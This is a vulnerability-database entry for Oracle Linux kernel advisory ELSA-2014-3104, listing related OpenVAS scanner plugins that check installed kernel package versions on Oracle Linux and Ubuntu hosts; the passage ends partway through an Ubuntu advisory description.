Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3104)
2014-12-15T00:00:00
ID ORACLELINUX_ELSA-2014-3104.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-12-15T00:00:00
{"openvas": [{"lastseen": "2019-05-29T18:36:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-1739", "CVE-2014-3688", "CVE-2014-3181", "CVE-2014-4027", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410"], "description": "Oracle Linux Local Security Checks ELSA-2014-3104", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123223", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3104", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3104.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123223\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:55 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3104\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3104 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3104\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3104.html\");\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-1739\", \"CVE-2014-3186\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.14.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.14.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-3688", "CVE-2014-4027", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410"], "description": "Oracle Linux Local Security Checks ELSA-2014-3103", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123227", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123227", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3103", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3103.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123227\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3103\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3103 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3103\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3103.html\");\n script_cve_id(\"CVE-2014-3182\", \"CVE-2014-3186\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~3.8.13~55.1.1.el7uek~0.4.3~4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~3.8.13~55.1.1.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~3.8.13~55.1.1.el6uek~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~3.8.13~55.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3688", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184"], "description": "Oracle Linux Local Security Checks ELSA-2014-3105", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123224", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3105.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123224\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:56 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3105\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3105 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3105\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3105.html\");\n script_cve_id(\"CVE-2014-3184\", \"CVE-2014-3688\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.12.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.12.el5uek~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.12.el5uekdebug~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.12.el5uek~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.12.el5uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.12.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.12.el6uek~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.12.el6uekdebug~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.12.el6uek~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.12.el6uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "description": "Oracle Linux Local Security Checks ELSA-2014-1971", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123230", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-1971", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-1971.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123230\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:01 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-1971\");\n script_tag(name:\"insight\", value:\"ELSA-2014-1971 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-1971\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-1971.html\");\n script_cve_id(\"CVE-2013-2929\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-5045\", \"CVE-2014-3185\", \"CVE-2014-3181\", \"CVE-2014-3687\", \"CVE-2014-3673\", \"CVE-2014-3184\", \"CVE-2014-1739\", \"CVE-2014-3182\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~123.13.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-6417", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-6416", "CVE-2014-6418", "CVE-2014-6410", "CVE-2014-3184"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-10-10T00:00:00", "id": "OPENVAS:1361412562310842002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842002", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2377-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2377_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-2377-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842002\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-10 06:10:54 +0200 (Fri, 10 Oct 2014)\");\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-6410\", \"CVE-2014-6416\", \"CVE-2014-6417\", \"CVE-2014-6418\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2377-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Steven Vittitoe reported multiple stack buffer overflows in Linux kernel's\nmagicmouse HID driver. A physically proximate attacker could exploit this\nflaw to cause a denial of service (system crash) or possibly execute\narbitrary code via specially crafted devices. (CVE-2014-3181)\n\nBen Hawkes reported some off by one errors for report descriptors in the\nLinux kernel's HID stack. A physically proximate attacker could 